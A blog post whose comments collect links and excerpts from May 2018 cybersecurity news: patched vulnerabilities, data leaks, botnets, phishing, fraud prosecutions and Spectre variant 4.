Cyber security May 2018

This posting is here to collect security alert news in May 2018.

I post links to security vulnerability news to comments of this article.

 

Security And Privacy

269 Comments

  1. Tomi Engdahl says:

    Adobe Reader zero-day discovered alongside Windows vulnerability
    https://blog.malwarebytes.com/threat-analysis/2018/05/adobe-reader-zero-day-discovered-alongside-windows-vulnerability/

    During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for Flash (CVE-2018-4878) and more recently for Internet Explorer (CVE-2018-8174). The former was quickly used by exploit kits such as Magnitude, while it is only a matter of time before we see the latter being weaponized more widely.

    We can now add to that list an Adobe Reader zero-day (CVE-2018-4990), which was reported by ESET and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.

    Reply
  2. Tomi Engdahl says:

    Some Firefox Screenshots End Up Publicly Accessible
    https://www.securityweek.com/firefox-saves-screenshots-publicly-accessible-cloud-servers

    Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.

    Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.

    Reply
  3. Tomi Engdahl says:

    U.S. Jury Convicts Operator of Counter AV Service Scan4You
    https://www.securityweek.com/us-jury-convicts-operator-counter-av-service-scan4you

    A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.

    Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.

    Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.

    Reply
  4. Tomi Engdahl says:

    Critical Code Execution Flaws Patched in Advantech WebAccess
    https://www.securityweek.com/critical-code-execution-flaws-patched-advantech-webaccess

    Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.

    Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.

    Reply
  5. Tomi Engdahl says:

    Auth0 Secures $55 Million in New Funding Round
    https://www.securityweek.com/auth0-secures-55-million-new-funding-round

    Identity-as-a-Service (IDaaS) company Auth0 this week announced $55 million in Series D funding led by Sapphire Ventures.

    Reply
  6. Tomi Engdahl says:

    Critical Command Injection Flaw Patched in Red Hat Linux
    https://www.securityweek.com/critical-command-injection-flaw-patched-red-hat-linux

    A critical vulnerability in the DHCP client in Red Hat Enterprise Linux could allow an attacker to execute arbitrary commands on impacted systems.

    Tracked as CVE-2018-1111, the security flaw was reported by Felix Wilhelm from Google’s Security Team. The bug was discovered in the NetworkManager integration script included in the DHCP client packages.

    The vulnerability features a CVSS3 Base Score of 7.5 and can be exploited without special privileges. However, an attacker targeting the bug could execute arbitrary commands with root privileges on vulnerable Red Hat systems.

    The DHCP client package in Red Hat includes a script for the NetworkManager component. The script is executed each time NetworkManager receives a DHCP response from a DHCP server. Thus, a malicious DHCP response could be used to cause the script to execute arbitrary shell commands.

    “A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol,” Red Hat explains.

    https://access.redhat.com/security/cve/cve-2018-1111

    Reply
  7. Tomi Engdahl says:

    NHS cyber-hero ‘discussed bank hack role’
    http://www.bbc.com/news/technology-44139467

    The British cyber-security expert credited with thwarting a major ransomware attack is attempting to prevent a phone call transcript being used against him in the US courts.

    The document quotes Marcus Hutchins as saying that he wrote code for an unidentified third-party, who then used it to make bank-hacking software.

    Mr Hutchins has been accused of creating and distributing the password-stealing malware Kronos.

    He has denied the charges.

    The Ilfracombe, Devon-based researcher rose to prominence a year ago when he halted the Wannacry ransomware attack

    “So, I wrote code for a guy a while back who then incorporated it into a banking malware,” Mr Hutchins is quoted as saying during the phone call after his arrest.

    Reply
  8. Tomi Engdahl says:

    Zack Whittaker / ZDNet:
    A bug in the website of LocationSmart, which sells real-time phone location data, let anyone track people’s locations across North America without consent — The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time. — A company that collects the real …

    Cell phone tracking firm exposed millions of Americans’ real-time locations
    https://www.zdnet.com/article/cell-phone-tracking-firm-exposed-millions-of-americans-real-time-locations/

    The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time.

    A company that collects the real-time location data on millions of cell phone customers across North America had a bug in its website that allowed anyone to see where a person is located — without obtaining their consent.

    Earlier this week, we reported that four of the largest cell giants in the US are selling your real-time location data to a company that you’ve probably never heard about before.

    The company, LocationSmart, is a data aggregator and claims to have “direct connections” to cell carriers to obtain locations from nearby cell towers. The site had its own “try-before-you-buy” page that lets you test the accuracy of its data. The page required explicit consent from the user before their location data can be used by sending a one-time text message to the user. When we tried with a colleague, we tracked his phone to a city block of his actual location.

    But that website had a bug that allowed anyone to track someone’s location silently without their permission.

    Reply
  9. Tomi Engdahl says:

    US cell carriers are selling access to your real-time phone location data
    https://www.zdnet.com/article/us-cell-carriers-selling-access-to-real-time-location-data/

    The company embroiled in a privacy row has “direct connections” to all major US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint — and Canadian cell networks, too.

    Reply
  10. Tomi Engdahl says:

    One in four APAC firms not sure if they suffered security breach
    https://www.zdnet.com/article/one-in-four-apac-firms-not-sure-if-they-suffered-security-breach/

    A quarter of Asia-Pacific companies have experienced a security incident, while 27 percent aren’t even sure because they haven’t conducted any data breach assessment–even as the region is estimated to have lost US$1.75 trillion last year due to cyberattacks.

    Reply
  11. Tomi Engdahl says:

    Mirai botnet adds three new attacks to target IoT devices
    https://www.zdnet.com/article/mirai-botnet-adds-three-new-attacks-to-target-iot-devices/

    This new version of the botnet uses exploits instead of brute force attacks to gain control of unpatched devices.

    Reply
  12. Tomi Engdahl says:

    Lily Hay Newman / Wired:
    Operator of malware-testing service Scan4You, which helped hackers evade antivirus software, convicted by US jury after Trend Micro gave data to the FBI — MOST ANTIVIRUS SCANNERS play a classic cat and mouse game: They work by checking software against a frequently updated list of potential threats.
    https://www.wired.com/story/inside-scan4you-takedown

    Reply
  13. Tomi Engdahl says:

    Music Business Worldwide:
    After reports that Tidal is inflating streaming numbers for big stars and is late paying royalties, company hires cybersecurity firm to investigate breach

    TIDAL investigates ‘potential data breach’ following fake streams accusation
    https://www.musicbusinessworldwide.com/tidal-investigates-potential-data-breach-following-accusations-of-fake-streams/

    Under-fire streaming platform TIDAL has announced that it has enlisted an “independent, third party cyber-security firm” to investigate a potential data breach at the company.

    Its reason for doing so, however, is slightly confusing: the platform strongly denies claims recently made by Norwegian financial newspaper Dagens Næringsliv, which suggest that the accounts of TIDAL subscribers were manipulated in 2016 to falsely bulk up streaming numbers allocated to Kanye West’s The Life Of Pablo and Beyoncé’s Lemonade.

    Reply
  14. Tomi Engdahl says:

    Cyrus Farivar / Ars Technica:
    Alleged owners of Mugshots.com, a site that publishes mugshots and demands payment for removal, arrested on extortion, money laundering, identity theft charges

    All of Mugshots.com’s alleged co-owners arrested on extortion charges
    https://arstechnica.com/tech-policy/2018/05/all-of-mugshots-coms-alleged-co-owners-arrested-on-extortion-charges/

    Mugshots.com is a “business permeated with fraud,” California AG says.

    Reply
  15. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    McAfee report: North Korea-linked hackers posted three apps on Google Play to steal personal info from defectors; hackers made contact with targets via Facebook

    North Korea-tied hackers used Google Play and Facebook to infect defectors
    Apps hosted in Google market for two months were spread over Facebook.
    https://arstechnica.com/information-technology/2018/05/north-korea-tied-hackers-use-google-play-and-facebook-to-infect-defectors/

    Researchers said a team of hackers tied to North Korea recently managed to get the Google Play market to host at least three Android apps designed to surreptitiously steal personal information from defectors of the isolated nation.

    The three apps first appeared in the official Android marketplace in January and weren’t removed until March when Google was privately notified. That’s according to a blog post published Thursday by researchers from security company McAfee. Two apps masqueraded as security apps, and a third purported to provide information about food ingredients. Hidden functions caused them to steal device information and allow them to receive additional executable code that stole personal photos, contact lists, and text messages.

    The apps were spread to selected individuals, in many cases by contacting them over Facebook. The apps had about 100 downloads when Google removed them.

    https://securingtomorrow.mcafee.com/mcafee-labs/malware-on-google-play-targets-north-korean-defectors/

    Reply
  16. Tomi Engdahl says:

    Patrick Winn / GlobalPost Investigations:
    Interviews with experts and defectors detail North Korea’s Reconnaissance General Bureau, whose hackers are estimated to have stolen $650M+ — The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews.

    How North Korean hackers became the world’s greatest bank robbers
    https://gpinvestigations.pri.org/how-north-korean-hackers-became-the-worlds-greatest-bank-robbers-492a323732a6

    The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews. In just the past few years, RGB hackers have struck more than 100 banks and cryptocurrency exchanges around the world, pilfering more than $650 million. That we know of.

    Reply
  17. Tomi Engdahl says:

    Chance Miller / 9to5Mac:
    Apple is telling developers to remove CallKit from apps listed in App Store in China after government request, likely because of CallKit’s VoIP functionalities — Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps …

    Apple cracking down on CallKit apps in China App Store due to government regulation
    https://9to5mac.com/2018/05/19/apple-cracking-down-on-callkit-apps-in-china-app-store-due-to-government-regulation/

    Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps, the company is now removing applications that use the CallKit framework. The move comes in response to newly enforced regulation from the Chinese Ministry of Industry and Information Technology, according to a message obtained by 9to5Mac…

    Reply
  18. Tomi Engdahl says:

    UK to introduce internet safety laws within ‘next couple of years’
    Social networks may be on the hook for exposing kids to online bullying.
    https://www.engadget.com/2018/05/20/uk-plans-internet-safety-laws/

    Reply
  19. Tomi Engdahl says:

    T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account
    https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/

    T-Mobile is investigating a retail store employee who allegedly made unauthorized changes to a subscriber’s account in an elaborate scheme to steal the customer’s three-letter Instagram username. The modifications, which could have let the rogue employee empty bank accounts associated with the targeted T-Mobile subscriber, were made even though the victim customer already had taken steps recommended by the mobile carrier to help minimize the risks of account takeover. Here’s what happened, and some tips on how you can protect yourself from a similar fate.

    Earlier this month, KrebsOnSecurity heard from Paul Rosenzweig, a 27-year-old T-Mobile customer from Boston who had his wireless account briefly hijacked.

    So-called “port out” scams allow crooks to intercept your calls and messages while your phone goes dark. Porting a number to a new provider shuts off the phone of the original user, and forwards all calls to the new device. Once in control of the mobile number, thieves who have already stolen a target’s password(s) can request any second factor that is sent to the newly activated device, such as a one-time code sent via text message or or an automated call that reads the one-time code aloud.

    A SIM swap is a legitimate process by which a customer can request that a new SIM card (the tiny, removable chip in a mobile device that allows it to connect to the provider’s network) be added to the account. Customers can request a SIM swap when their existing SIM card has been damaged, or when they are switching to a different phone that requires a SIM card of another size.

    However, thieves and other ne’er-do-wells can abuse this process by posing as a targeted mobile customer or technician and tricking employees at the mobile provider into swapping in a new SIM card for that customer on a device that they control. If successful, the SIM swap accomplishes more or less the same result as a number port out (at least in the short term) — effectively giving the attackers access to any text messages or phone calls that are sent to the target’s mobile account.

    Reply
  20. Tomi Engdahl says:

    Chrome to Issue Red “Not Secure” Warning for HTTP
    https://www.securityweek.com/chrome-issue-red-not-secure-warning-http

    Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.

    The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.

    Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.

    Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.

    At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.

    “Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.

    Reply
  21. Tomi Engdahl says:

    Hacked Drupal Sites Deliver Miners, RATs, Scams
    https://www.securityweek.com/hacked-drupal-sites-deliver-miners-rats-scams

    The Drupal websites hacked by cybercriminals using the vulnerabilities known as Drupalgeddon2 and Drupalgeddon3 deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

    Two highly critical flaws were patched in recent months in the Drupal content management system (CMS). The security holes are tracked as CVE-2018-7600 and CVE-2018-7602, and they both allow remote code execution.

    Malicious actors started exploiting CVE-2018-7600, dubbed Drupalgeddon2, roughly two weeks after a patch was released and shortly after a proof-of-concept (PoC) exploit was made public.

    CVE-2018-7602, dubbed Drupalgeddon 3, was discovered during an analysis of CVE-2018-7600 by the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability. Hackers started exploiting CVE-2018-7602 immediately after the release of a patch.

    Reply
  22. Tomi Engdahl says:

    Two Vulnerabilities Patched in BIND DNS Software
    https://www.securityweek.com/two-vulnerabilities-patched-bind-dns-software

    Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.

    While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.

    One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.

    The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.

    Reply
  23. Tomi Engdahl says:

    Man Sentenced to 15 Years in Prison for DDoS Attacks, Firearm Charges
    https://www.securityweek.com/man-sentenced-15-years-prison-ddos-attacks-firearm-charges

    A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

    John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.

    Reply
  24. Tomi Engdahl says:

    More Charges Against ‘Syrian Electronic Army’ Hackers
    https://www.securityweek.com/more-charges-against-syrian-electronic-army-hackers

    The U.S. Justice Department on Thursday announced more charges against two Syrian nationals believed to be members of the “Syrian Electronic Army” hacker group.

    Ahmad ‘Umar Agha, 24, known online as “The Pro,” and Firas Dardar, 29, known online as “The Shadow,” have been indicted on 11 counts of conspiracy to commit computer fraud, conspiracy to commit wire fraud, and aggravated identity theft.

    Reply
  25. Tomi Engdahl says:

    “Wicked” Variant of Mirai Botnet Emerges
    https://www.securityweek.com/wicked-variant-mirai-botnet-emerges

    A new variant of the Mirai Internet of Things (IoT) botnet has emerged, which features new exploits in its arsenal and distributing a new bot, Fortinet researchers warn.

    Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.

    The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.

    Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.

    Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.

    A Wicked Family of Bots
    https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html

    Reply
  26. Tomi Engdahl says:

    Phishing Roundup: Caracal, Stealth Mango, Tangelo, Apple, DHL, eFax & More
    https://www.bleepingcomputer.com/news/security/phishing-roundup-caracal-stealth-mango-tangelo-apple-dhl-efax-and-more/

    Phishing takes place when a fraudster tricks an individual into sharing sensitive information (account numbers, Social Security numbers, login credentials, etc.) by way of fraudulent emails, texts, or counterfeit websites. Phishing can also enable a scammer to gain access to a computer or network so that they can install malware, such as ransomware, on a victim’s computer. Phishers are able to achieve this by spoofing the familiar, trusted logos of established, legitimate companies. Or, they may pose as a friend or family member and are often successful in completely deluding their targets.

    Reply
  27. Tomi Engdahl says:

    Business Email Compromise incidents
    https://isc.sans.edu/forums/diary/Business+Email+Compromise+incidents/23669/

    Over the past 12 months we have seen a sharp increase in the number of incidents relating to the compromise of business emails. Often O365, but also some Gmail and on premise systems with webmail access.

    The objective is simple, use the system to convince the organisation, or a customer of the organisation to pay a fake invoice and transfer the money overseas. The average net of these breaches is around $85,000, but there have been cases well into the 7 figures. So quite worthwhile for the attacker. Most organisations are not set up to prevent or detect this kind of attack until it is too late.

    Whilst similar to whaling emails the approach is more thought out and structured. The attacks are typically targeted. There are two scenarios we usually see:

    Compromise victim company, identify invoices to be paid by the victim, spoof the company to be paid and convince the victim to pay to an incorrect account.
    Compromise victim company, identify customer invoices to be paid to the victim, Spoof the victim and convince customers to pay invoices into an incorrect account.

    There are a few opportunities to detect or prevent these kinds of attacks:

    Prevent
    Have a robust payment changing process – validate using details you have in your database and call them regardless of whether someone called you
    Don’t pay to overseas accounts – especially when previous invoices were payed within the country.
    Check previous payments – Where did they go, is this different, if so halt the payment.
    Disallow forwarding rules to external addresses – This won’t stop it, but does make it more difficult
    Multi Factor Authentication (MFA) on mail
    Detect
    Logins from locations other than your office
    Logins where the IP address changes – we see many use open proxies when logging into a victim account. In logs that looks like the person travels rapidly across the globe.
    Regularly interrogate rules created in the email product – this is often how we find the other compromised accounts.

    Reply
  28. Tomi Engdahl says:

    Anatomy of a Redis mining worm
    https://isc.sans.edu/forums/diary/Anatomy+of+a+Redis+mining+worm/23673/

    Public accessible Redis servers are being exploited for a while now, but we stumbled upon an interesting mining worm in one of our honeytraps. Within the past 5 days, we’ve seen 173 unique IP addresses that have been infected with this worm, whereof 88% of the infected servers are located in China, 4% in the US and 4% Hongkong.

    The worm searches for open Redis servers (port 6379), configures cron to download itself every few minutes (using a file upload service), starts mining and finally looks for new targets. It will send the payload “*1\r\n$4\r\nINFO\r\n” and check the response for the string “os:Linux”, to prevent replication to other operating systems.

    When the cron job executes, the worm will disable security, close the existing publicly open Redis port using iptables, disable SELinux and disable caching. If there are miners running, they will be killed and the cryptonight miner starts. The worm is taking advantage of public file hosting, in this case, transfer.sh, to replicate itself. Transfer.sh removes files after 14 days, that’s assumed to be the reason that a copy will be made on each replication.

    Reply
  29. Tomi Engdahl says:

    Was the Efail disclosure horribly screwed up?
    https://blog.cryptographyengineering.com/2018/05/17/was-the-efail-disclosure-horribly-screwed-up/

    On Monday a team of researchers from Münster, RUB and NXP disclosed serious cryptographic vulnerabilities in a number of encrypted email clients. The flaws, which go by the cute vulnerability name of “Efail”, potentially allow an attacker to decrypt S/MIME or PGP-encrypted email with only minimal user interaction.

    By the standards of cryptographic vulnerabilities, this is about as bad as things get. In short: if an attacker can intercept and alter an encrypted email — say, by sending you a new (altered) copy, or modifying a copy stored on your mail server — they can cause many GUI-based email clients to send the full plaintext of the email to an attacker controlled-server. Even worse, most of the basic problems that cause this flaw have been known for years, and yet remain in clients.

    The big (and largely under-reported) story of EFail is the way it affects S/MIME. That “corporate” email protocol is simultaneously (1) hated by the general crypto community because it’s awful and has a slash in its name, and yet (2) is probably the most widely-used email encryption protocol in the corporate world.

    Efail also happens to affect a smaller, but non-trivial number of OpenPGP-compatible clients.

    How Efail was disclosed to the PGP community

    Putting together a comprehensive timeline of the Efail disclosure process would probably be a boring, time-intensive project. Fortunately Thomas Ptacek loves boring and time-intensive projects, and has already done this for us.

    Briefly, the first Efail disclosures to vendors began last October, more than 200 days prior to the agreed publication date. The authors notified a large number of vulnerable PGP GUI clients, and also notified the GnuPG project (on which many of these projects depend) by February at the latest. From what I can tell every major vendor agreed to make some kind of patch. GnuPG decided that it wasn’t their fault, and basically stopped corresponding.

    All parties agreed not to publicly discuss the vulnerability until an agreed date in April, which was later pushed back to May 15. The researchers also notified the EFF and some journalists under embargo, but none of them leaked anything. On May 14 someone dumped the bug onto a mailing list. So the EFF posted a notice about the vulnerability (which we’ll discuss a bit more below), and the researchers put up a website. That’s pretty much the whole story.

    There are three basic accusations going around about the Efail disclosure. They can be summarized as (1) maintaining embargoes in coordinated disclosures is really hard, (2) the EFF disclosure “unfairly” made this sound like a serious vulnerability “when it isn’t”, and (3) everything was already patched anyway so what’s the big deal.

    A unified timeline of Efail PGP disclosure events
    http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html

    Reply
  30. Tomi Engdahl says:

    Insecure Claymore Miner Management API Exploited in the Wild
    https://isc.sans.edu/forums/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665/

    We have seen a notable increase in scans for port 3333/tcp in the wild. Port 3333 is used by a variety of crypto coin miners and mining pools.

    Reply
  31. Tomi Engdahl says:

    200 Million Sets of Japanese PII Emerge on Underground Forums
    https://www.securityweek.com/200-million-sets-japanese-pii-emerge-underground-forums

    A dataset allegedly containing 200 million unique sets of personally identifiable information (PII) exfiltrated from several popular Japanese website databases emerged on underground forums, FireEye reports.

    Advertised by a Chinese threat actor at around $150, the dataset contained names, credentials, email addresses, dates of birth, phone numbers, and home addresses, and was initially spotted in December 2017.

    The data appears sourced from a variety of Japanese websites, including those in the retail, food and beverage, financial, entertainment, and transportation sectors, and FireEye believes that the cybercriminals obtained it via opportunistic compromises.

    Reply
  32. Tomi Engdahl says:

    Misconfigured CalAmp Server Enabled Vehicle Takeover
    https://www.securityweek.com/misconfigured-calamp-server-enabled-vehicle-takeover

    A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.

    The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.

    The researchers discovered that the application uses a SSL connection and uses SSL pinning to prevent tampering.

    Reply
  33. Tomi Engdahl says:

    DHS Publishes New Cybersecurity Strategy
    https://www.securityweek.com/dhs-publishes-new-cybersecurity-strategy

    The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.

    The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide “the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient.”

    https://www.dhs.gov/sites/default/files/publications/DHS-Cybersecurity-Strategy_1.pdf

    Reply
  34. Tomi Engdahl says:

    Tara Francis Chan / Business Insider:
    Chinese state-run media says the country’s social credit system has blocked people from taking over 11M flights and 4M train trips; full rollout coming by 2020
    http://www.businessinsider.com/china-social-credit-system-blocked-people-taking-flights-train-trips-2018-5?op=1

    Reply
  35. Tomi Engdahl says:

    Zack Whittaker / ZDNet:
    TeenSafe, an app for parents to monitor kids’ phone use, stored some app login passwords and kids’ Apple ID credentials in plaintext on an unsecured AWS server

    Teen phone monitoring app leaked thousands of user passwords
    https://www.zdnet.com/article/teen-phone-monitoring-app-leaks-thousands-of-users-data/

    Exclusive: A server stored teenagers’ Apple ID email addresses and plaintext passwords.

    At least one server used by an app for parents to monitor their teenagers’ phone activity has leaked tens of thousands of accounts of both parents and children.

    The mobile app, TeenSafe, bills itself as a “secure” monitoring app for iOS and Android, which lets parents view their child’s text messages and location, monitor who they’re calling and when, access their web browsing history, and find out which apps they have installed.

    Although teen monitoring apps are controversial and privacy-invasive, the company says it doesn’t require parents to obtain the consent of their children.

    Robert Wiggins, a UK-based security researcher who searches for public and exposed data, found two leaky servers.

    Both of the servers was pulled offline after ZDNet alerted the company,

    “We have taken action to close one of our servers to the public and begun alerting customers that could potentially be impacted,” said a TeenSafe spokesperson told ZDNet on Sunday.

    The database stores the parent’s email address associated with TeenSafe, as well as their corresponding child’s Apple ID email address. It also includes the child’s device name — which is often just their name — and their device’s unique identifier.

    there were at least 10,200 records from the past three months containing customers data

    TeenSafe claims to have over a million parents using the service.

    We contacted a dozen people over iMessage, one by one, to confirm their passwords

    It’s not clear why the data, let alone passwords for teens’ Apple IDs, was stored in plaintext.

    The company claims on its website that it’s “secure” and uses encryption

    How not to verify a data breach (and why some really want you to get ‘pwned’)
    Whatever you do, don’t break the law…
    https://www.zdnet.com/article/how-not-to-verify-a-data-breach/

    Just as hackers want verification for credibility or acclaim, some breach sites want news coverage to sell something. The hacked companies want to know so they can disaster-manage (companies get hacked because their security is bad, not because the hackers are always that good), and news outlets want the exclusive.

    But also — verification is important for the victims. The sooner victims know about data breaches, the sooner they can protect themselves.

    Make no mistake, verifying data isn’t an easy process. It’s time consuming, laborious, and not always fruitful.

    Logging into someone else’s account without permission is illegal in the US.

    Besides, that still wouldn’t be enough to verify a breach

    When reporters verify breaches, they walk a line to ensure they’re not intrusive or inconveniencing people. One of the easiest ways to begin verifying a breach is by enumerating disposable Mailinator email accounts through a website’s password reset field. Reporters also have to examine the data

    This boom in hack reporting has in part led to a cycle of more awareness and coverage, which has led to more data breach monitoring and notification sites popping up

    Reply
  36. Tomi Engdahl says:

    Microsoft, Google: We’ve found a fourth data-leaking Meltdown-Spectre CPU hole
    Design blunder exists in Intel, AMD, Arm, Power processors
    https://www.theregister.co.uk/2018/05/21/spectre_meltdown_v4_microsoft_google/

    A fourth variant of the data-leaking Meltdown-Spectre security flaws in modern processors has been found by Microsoft and Google researchers.

    These speculative-execution design blunders can be potentially exploited by malicious software running on a vulnerable device or computer

    Variants 1 and 2 are known as Spectre (CVE-2017-5753, CVE-2017-5715), and variant 3 is Meltdown (CVE-2017-5754). Today, variant 4 (CVE-2018-3639) was disclosed by Microsoft and Google researchers.

    It affects modern out-of-order execution processor cores from Intel, AMD, and Arm, as well as IBM’s Power 8, Power 9, and System z CPUs. Bear in mind, Arm cores are used the world over in smartphones, tablets, and embedded electronics.

    The fourth variant can be potentially exploited by script files running within a program – such as JavaScript on a webpage in a browser tab

    According to Intel, mitigations already released to the public for variant 1, which is the hardest vulnerability to tackle, should make attacks leveraging variant 4 much more difficult.

    So far, no known exploit code is circulating in the wild targeting the fourth variant.

    Another bug, CVE-2018-3640, was also disclosed: this is a rogue system register read, allowing normal programs to peek at hardware status flags and the like in registers that should only really be accessible by the operating system kernel, drivers, and hypervisors.

    Variant 4 is referred to as a speculative store bypass. It is yet another “wait, why didn’t I think of that?” design oversight in modern out-of-order-execution engineering.

    The name Spectre was chosen deliberately: it is like observing a ghost in the machine. Private data can be discerned by watching the cache being updated by the processor’s speculative execution engine. This speculation is crucial to running chips as fast as possible

    Intel, Arm, et al response

    “Variant 4 uses speculative execution, a feature common to most modern processor architectures, to potentially expose certain kinds of data through a side channel,” said Leslie Culbertson, Intel’s executive veep of product security.

    “Starting in January, most leading browser providers deployed mitigations for Variant 1 in their managed runtimes – mitigations that substantially increase the difficulty of exploiting side channels in a web browser. These mitigations are also applicable to Variant 4 and available for consumers to use today.”

    According to Culbertson, Intel and others will issue new microcode and software tweaks to more fully counter malware exploiting the fourth variant.

    “We’ve already delivered the microcode update for Variant 4 in beta form to OEM system manufacturers and system software vendors, and we expect it will be released into production BIOS and software updates over the coming weeks.

    “This mitigation will be set to off-by-default, providing customers the choice of whether to enable it or not. We expect most industry software partners will likewise use the default-off option.

    If enabled, we’ve observed a performance impact of approximately 2-8 per cent

    Arm will make available to system-on-chip designers updated blueprints for Cortex-A72, Cortex-A73, and Cortex-A75 cores that are resistant to Spectre variant 2, and the Cortex-A75 will be updated to resist Meltdown, aka variant 3.

    Red Hat today published a substantial guide to the fourth variant, its impact, and how it works. VMware also has an advisory and updates, here,

    We note that, so far, no malware has been seen attacking any of the Spectre and Meltdown holes in today’s chips, let alone this latest variant

    Speculative Store Buffer Bypass in 3 minutes
    https://www.youtube.com/watch?v=Uv6lDgcUAC0

    Speculative Store Buffer Bypass is a security vulnerability that allows unauthorized users to steal sensitive information through websites. Similar to the Spectre and Meltdown threats in early 2018, it exploits speculative execution–a process most computers use to speed up routine tasks

    Reply
  37. Tomi Engdahl says:

    FireEye Launches OAuth Attack Testing Platform
    https://www.securityweek.com/fireeye-launches-oauth-attack-testing-platform

    FireEye on Monday announced the availability of a platform to allow organizations and pentesters check their ability to detect and respond to OAuth abuse attacks.

    OAuth 2.0 is a protocol employed by major Internet companies, including Amazon, Google, Facebook, and Microsoft, to facilitate granting third-party applications access to user data. Using social engineering, attackers can trick victims into authorizing a third-party application to access their account, thus gaining access to all of the user’s data without the need for credentials.

    “In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders,” FireEye’s Doug Bienstock explains.

    In an OAuth authorization flow, the third-party application requests a specific type of access to a user’s account, and APIs are used to define such sets of scopes (similar to the permissions apps ask for on mobile devices).

    An attacker looking to abuse OAuth can create a malicious application and then retrieve user data with the help of obtained access tokens, via the API Resource. Access tokens don’t require a password and can bypass any two-factor enforcement in place, and access to the OAuth application has to be explicitly revoked to prevent abuse.

    Shining a Light on OAuth Abuse with PwnAuth
    https://www.fireeye.com/blog/threat-research/2018/05/shining-a-light-on-oauth-abuse-with-pwnauth.html

    Reply
  38. Tomi Engdahl says:

